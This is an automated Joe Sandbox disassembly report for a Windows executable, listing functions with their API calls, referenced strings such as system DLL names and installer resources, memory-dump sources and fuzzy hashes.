Part of subcall function 00007FF7E1DCDFD0: GetSystemDirectoryW.KERNEL32 ref: 00007FF7E1DCDDDF

CompareStringW.KERNELBASE ref: 00007FF7E1DCE559
CloseHandle.KERNEL32 ref: 00007FF7E1DCE4F3

Part of subcall function 00007FF7E1DB1FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DB1FFB

Part of subcall function 00007FF7E1DC51A4: GetVersionExW.KERNEL32 ref: 00007FF7E1DC51D5

Part of subcall function 00007FF7E1DCDFD0: LoadLibraryW.KERNELBASE ref: 00007FF7E1DCDEFF
Part of subcall function 00007FF7E1DCDFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DCDFB5
Part of subcall function 00007FF7E1DCDFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DCDFBB
Part of subcall function 00007FF7E1DCDFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DCDFC1
Part of subcall function 00007FF7E1DCDFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DCDFC7

AllocConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF7E1DCE74B
GetCurrentProcessId.KERNEL32(?,?,?,00000000,?), ref: 00007FF7E1DCE755
AttachConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF7E1DCE75D
GetStdHandle.KERNEL32(?,?,?,00000000,?), ref: 00007FF7E1DCE780
WriteConsoleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF7E1DCE799
Sleep.KERNEL32(?,?,?,00000000,?), ref: 00007FF7E1DCE7A4
FreeConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF7E1DCE7AA
ExitProcess.KERNEL32 ref: 00007FF7E1DCE7BB

Strings

srvcli.dll, xrefs: 00007FF7E1DCE221
msasn1.dll, xrefs: 00007FF7E1DCE195
shdocvw.dll, xrefs: 00007FF7E1DCE179
ieframe.dll, xrefs: 00007FF7E1DCE120
version.dll, xrefs: 00007FF7E1DCE07B
mpr.dll, xrefs: 00007FF7E1DCE291
cryptbase.dll, xrefs: 00007FF7E1DCE0C8
wintrust.dll, xrefs: 00007FF7E1DCE1B1
linkinfo.dll, xrefs: 00007FF7E1DCE347
SetDllDirectoryW, xrefs: 00007FF7E1DCE026
cryptui.dll, xrefs: 00007FF7E1DCE1A3
apphelp.dll, xrefs: 00007FF7E1DCE14F
dnsapi.DLL, xrefs: 00007FF7E1DCE259
usp10.dll, xrefs: 00007FF7E1DCE0DE
SetDefaultDllDirectories, xrefs: 00007FF7E1DCE053
dhcpcsvc.dll, xrefs: 00007FF7E1DCE32B
netutils.dll, xrefs: 00007FF7E1DCE283
secur32.dll, xrefs: 00007FF7E1DCE1CD
browcli.dll, xrefs: 00007FF7E1DCE301
dsrole.dll, xrefs: 00007FF7E1DCE37F
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00007FF7E1DCE73B
peerdist.dll, xrefs: 00007FF7E1DCE38D
rsaenh.dll, xrefs: 00007FF7E1DCE0A7
dhcpcsvc6.dll, xrefs: 00007FF7E1DCE31D
shell32.dll, xrefs: 00007FF7E1DCE1BF
setupapi.dll, xrefs: 00007FF7E1DCE141
cryptsp.dll, xrefs: 00007FF7E1DCE355
slc.dll, xrefs: 00007FF7E1DCE23D
oleaccrc.dll, xrefs: 00007FF7E1DCE1E9
comres.dll, xrefs: 00007FF7E1DCE0F4
clbcatq.dll, xrefs: 00007FF7E1DCE0E9
netapi32.dll, xrefs: 00007FF7E1DCE16B
lpk.dll, xrefs: 00007FF7E1DCE0D3
wkscli.dll, xrefs: 00007FF7E1DCE2E5
ntshrui.dll, xrefs: 00007FF7E1DCE12B
RpcRtRemote.dll, xrefs: 00007FF7E1DCE363
kernel32, xrefs: 00007FF7E1DCE011
ws2_32.dll, xrefs: 00007FF7E1DCE0FF
atl.dll, xrefs: 00007FF7E1DCE136
propsys.dll, xrefs: 00007FF7E1DCE2AD
rasadhlp.dll, xrefs: 00007FF7E1DCE30F
uxtheme.dll, xrefs: 00007FF7E1DCE66D
profapi.dll, xrefs: 00007FF7E1DCE205
dwmapi.dll, xrefs: 00007FF7E1DCE0BD, 00007FF7E1DCE661
cscapi.dll, xrefs: 00007FF7E1DCE22F
WindowsCodecs.dll, xrefs: 00007FF7E1DCE213
mlang.dll, xrefs: 00007FF7E1DCE2BB
ntmarta.dll, xrefs: 00007FF7E1DCE1F7
UXTheme.dll, xrefs: 00007FF7E1DCE0B2
XmlLite.dll, xrefs: 00007FF7E1DCE339
ws2help.dll, xrefs: 00007FF7E1DCE10A
WINNSI.DLL, xrefs: 00007FF7E1DCE275
crypt32.dll, xrefs: 00007FF7E1DCE187
DXGIDebug.dll, xrefs: 00007FF7E1DCE086, 00007FF7E1DCE5B6
userenv.dll, xrefs: 00007FF7E1DCE15D
iphlpapi.DLL, xrefs: 00007FF7E1DCE267
psapi.dll, xrefs: 00007FF7E1DCE115
aclui.dll, xrefs: 00007FF7E1DCE371
sfc_os.dll, xrefs: 00007FF7E1DCE091
samlib.dll, xrefs: 00007FF7E1DCE2D7
cabinet.dll, xrefs: 00007FF7E1DCE1DB
SSPICLI.DLL, xrefs: 00007FF7E1DCE09C
samcli.dll, xrefs: 00007FF7E1DCE2C9
dfscli.dll, xrefs: 00007FF7E1DCE2F3
imageres.dll, xrefs: 00007FF7E1DCE24B
devrtl.dll, xrefs: 00007FF7E1DCE29F

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
API String ID: 1496594111-2013832382
Opcode ID: 19926894803355f4926a5d38047f13a95aa4f57e947c60c8a04cc60affe7caae
Instruction ID: 32932c0cfe82c29662527589559043fbdc7af572901f36bd777a6103f1f21f33
Opcode Fuzzy Hash: 19926894803355f4926a5d38047f13a95aa4f57e947c60c8a04cc60affe7caae
Instruction Fuzzy Hash: B7323031A09B8295EB15EF20E8422E9B3A5FF48354FD00237EA4D46769EFBCD264C751

Function 00007FF7E1DC98DC Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E1DC8E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E1DC8F8D

_snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7E1DC9F75
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DCA42F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DCA435

Part of subcall function 00007FF7E1DD0BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7E1DD0B44), ref: 00007FF7E1DD0BE9

Strings

,, xrefs: 00007FF7E1DC9FAA
MENU, xrefs: 00007FF7E1DC9DD9
*messages***, xrefs: 00007FF7E1DC9BC6
, xrefs: 00007FF7E1DC9DF9
RTL, xrefs: 00007FF7E1DC9F2E
*messages***, xrefs: 00007FF7E1DC9C04
@%s:, xrefs: 00007FF7E1DC9F57
$%s:, xrefs: 00007FF7E1DC9F50
STRINGS, xrefs: 00007FF7E1DC9DC1
DIALOG, xrefs: 00007FF7E1DC9DCD
DIRECTION, xrefs: 00007FF7E1DC9DE5

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
API String ID: 3629253777-3268106645
Opcode ID: 96347e7981fae7733940ad93ba4258564ebec1a9a55cc8409c872ccb2165f156
Instruction ID: 6baf61932d86a4676fedd8aee2fc606b0a1e7a64d5eb0a45136baac8c0fa9c56
Opcode Fuzzy Hash: 96347e7981fae7733940ad93ba4258564ebec1a9a55cc8409c872ccb2165f156
Instruction Fuzzy Hash: B462E222A1969281EB14EF24C4463FDA365FB40784FC09933EA4E476D5EFBCE545C3A2

Function 00007FF7E1DE1900 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7E1DE1558: DloadProtectSection.DELAYIMP ref: 00007FF7E1DE15C9

RaiseException.KERNEL32 ref: 00007FF7E1DE19A7
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00007FF7E1DE1993

Part of subcall function 00007FF7E1DE1868: DloadProtectSection.DELAYIMP ref: 00007FF7E1DE18C7

LoadLibraryExA.KERNELBASE ref: 00007FF7E1DE1A46
GetLastError.KERNEL32 ref: 00007FF7E1DE1A54
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00007FF7E1DE1A86
RaiseException.KERNEL32 ref: 00007FF7E1DE1A9A

Strings

H, xrefs: 00007FF7E1DE1974

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
String ID: H
API String ID: 3432403771-2852464175
Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
Instruction ID: c53f53fc05a32c142553f17c5d3a8c095b2b77a133945727a056f5a8ee3bfd7e
Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
Instruction Fuzzy Hash: 4E916B22F04B118AEB14DF61D8457ACB3A0FB08B89F848136CE0D47758EFB8E555C322

Function 00007FF7E1DDF4E0 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 285
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32 ref: 00007FF7E1DDF747
ShowWindow.USER32 ref: 00007FF7E1DDF786
GetExitCodeProcess.KERNEL32 ref: 00007FF7E1DDF7BD
CloseHandle.KERNEL32 ref: 00007FF7E1DDF7E7
ShowWindow.USER32 ref: 00007FF7E1DDF83F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDF8FB

Strings

.exe, xrefs: 00007FF7E1DDF7F2
.inf, xrefs: 00007FF7E1DDF675
p, xrefs: 00007FF7E1DDF529
Install, xrefs: 00007FF7E1DDF684

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
String ID: .exe$.inf$Install$p
API String ID: 1054546013-3607691742
Opcode ID: bd083846a701d2a936ecc778425380adf73900159b5be9ae941c3623c510174f
Instruction ID: 620f4422edb14849d099d71bfcdd92059aacbcc10b8f851d400cc398a91a6adc
Opcode Fuzzy Hash: bd083846a701d2a936ecc778425380adf73900159b5be9ae941c3623c510174f
Instruction Fuzzy Hash: 2CC19362F1860295FB00EB65D9423B9A3B1AF89B84FC44133DE4D476A5DFBCE456C322

Function 00007FF7E1DDF0A4 Relevance: 16.6, APIs: 11, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7E1DDAE1C: PeekMessageW.USER32 ref: 00007FF7E1DDAE32
Part of subcall function 00007FF7E1DDAE1C: GetMessageW.USER32 ref: 00007FF7E1DDAE49
Part of subcall function 00007FF7E1DDAE1C: IsDialogMessageW.USER32 ref: 00007FF7E1DDAE60
Part of subcall function 00007FF7E1DDAE1C: TranslateMessage.USER32 ref: 00007FF7E1DDAE6F
Part of subcall function 00007FF7E1DDAE1C: DispatchMessageW.USER32 ref: 00007FF7E1DDAE7A

GetDlgItem.USER32 ref: 00007FF7E1DDF0E3
ShowWindow.USER32 ref: 00007FF7E1DDF109
IsDlgButtonChecked.USER32 ref: 00007FF7E1DDF11E
IsDlgButtonChecked.USER32 ref: 00007FF7E1DDF136
IsDlgButtonChecked.USER32 ref: 00007FF7E1DDF157
IsDlgButtonChecked.USER32 ref: 00007FF7E1DDF173
IsDlgButtonChecked.USER32 ref: 00007FF7E1DDF1B6
IsDlgButtonChecked.USER32 ref: 00007FF7E1DDF1D4
IsDlgButtonChecked.USER32 ref: 00007FF7E1DDF1E8
IsDlgButtonChecked.USER32 ref: 00007FF7E1DDF212
IsDlgButtonChecked.USER32 ref: 00007FF7E1DDF22A

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
String ID:
API String ID: 4119318379-0
Opcode ID: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
Instruction ID: feeb5531bbdc27fd99c2944d8da0972902def6ffa5bf661c01629aa653967fce
Opcode Fuzzy Hash: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
Instruction Fuzzy Hash: 0741E232B1464286F700EF61E812BAAB360EB89F99FC40136ED4E07B95CFBDD4458765

Function 00007FF7E1DBEF10 Relevance: 11.0, APIs: 7, Instructions: 453COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBF542
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBF548
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBF554
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBF55A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBF560
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBF56C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBF572

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: e994a9db728abc9e3b7c2f1aeddd0c1bbb8b4fdc17eb45be45aeabee48c93372
Instruction ID: 79f14f5da79cdec649c90fdffc74d9ce95309eaa92325e81b0c48d160e5a7b78
Opcode Fuzzy Hash: e994a9db728abc9e3b7c2f1aeddd0c1bbb8b4fdc17eb45be45aeabee48c93372
Instruction Fuzzy Hash: AF12F162F0874194EB10EB64D4427ECA371EB447A8F804233DA5E17AD9DFBCE58AC351

Function 00007FF7E1DC24C0 Relevance: 9.2, APIs: 6, Instructions: 164
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FF7E1DC259B
GetLastError.KERNEL32 ref: 00007FF7E1DC25AE
CreateFileW.KERNEL32 ref: 00007FF7E1DC260E
GetLastError.KERNEL32 ref: 00007FF7E1DC2617
SetFileTime.KERNEL32 ref: 00007FF7E1DC26C9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DC2736

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3536497005-0
Opcode ID: 7e74b88d639c8d570aa5cbccebcd9353285634c108726f52f9c563d03d833b9c
Instruction ID: 2bfa529308b74f9839aa2f61804b27ec031d453aeaa6c525a6394fddb14771dc
Opcode Fuzzy Hash: 7e74b88d639c8d570aa5cbccebcd9353285634c108726f52f9c563d03d833b9c
Instruction Fuzzy Hash: 7561F566A1874185EB20DB29E44136EA7B1FB847A8F500336DFAD03AD8CF7DD0A5C751

Function 00007FF7E1DDB014 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadBitmapW.USER32 ref: 00007FF7E1DDB02A
GetObjectW.GDI32 ref: 00007FF7E1DDB05B
DeleteObject.GDI32 ref: 00007FF7E1DDB095
DeleteObject.GDI32 ref: 00007FF7E1DDB0C5

Part of subcall function 00007FF7E1DD8624: FindResourceW.KERNEL32 ref: 00007FF7E1DD863D
Part of subcall function 00007FF7E1DD8624: SizeofResource.KERNEL32 ref: 00007FF7E1DD8659
Part of subcall function 00007FF7E1DD8624: LoadResource.KERNEL32 ref: 00007FF7E1DD8673
Part of subcall function 00007FF7E1DD8624: LockResource.KERNEL32 ref: 00007FF7E1DD8685
Part of subcall function 00007FF7E1DD8624: GlobalAlloc.KERNELBASE ref: 00007FF7E1DD86A6
Part of subcall function 00007FF7E1DD8624: GlobalLock.KERNEL32 ref: 00007FF7E1DD86BB
Part of subcall function 00007FF7E1DD8624: GdipAlloc.GDIPLUS ref: 00007FF7E1DD86FE
Part of subcall function 00007FF7E1DD8624: GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF7E1DD8769
Part of subcall function 00007FF7E1DD8624: GlobalUnlock.KERNEL32 ref: 00007FF7E1DD878C
Part of subcall function 00007FF7E1DD8624: GlobalFree.KERNEL32 ref: 00007FF7E1DD8795

Strings

], xrefs: 00007FF7E1DDB063

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
String ID: ]
API String ID: 2347093688-3352871620
Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
Instruction ID: 8fc77f66d5151e7e327904687b6f3a500a261bf8041289a64ad8f939a0b171a7
Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
Instruction Fuzzy Hash: 1911B920B0924242FF25F711D656779D392AFCABC4F880136ED5D07B99DEBCE8548712

Function 00007FF7E1DDAE1C Relevance: 7.5, APIs: 5, Instructions: 27
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32 ref: 00007FF7E1DDAE32
GetMessageW.USER32 ref: 00007FF7E1DDAE49
IsDialogMessageW.USER32 ref: 00007FF7E1DDAE60
TranslateMessage.USER32 ref: 00007FF7E1DDAE6F
DispatchMessageW.USER32 ref: 00007FF7E1DDAE7A

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
Instruction ID: 3eaa236b9351fc5f5fa116c0d671132563484501508a0f6f93eccbe2482597a7
Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
Instruction Fuzzy Hash: CDF0EC26B3855282FB51EB20E896BB6A3A1BFD0B46FC15472F98E42854DF7CD508CB11

Function 00007FF7E1DD91E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32 ref: 00007FF7E1DD9211
SHAutoComplete.SHLWAPI ref: 00007FF7E1DD9255

Part of subcall function 00007FF7E1DD13C4: CompareStringW.KERNEL32 ref: 00007FF7E1DD13E3

FindWindowExW.USER32 ref: 00007FF7E1DD923F

Strings

EDIT, xrefs: 00007FF7E1DD921B, 00007FF7E1DD9233

Memory Dump Source

Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true

Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
Instruction ID: 8d475a300f48051f6b9aa20d51ee36d99435a0a6de8bcd9fc8d148ff88c64499
Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
Instruction Fuzzy Hash: ED01D121B18A4381FB24EB21F8127F6E390BF99745FC80133DC4E06658DEBCE1498621

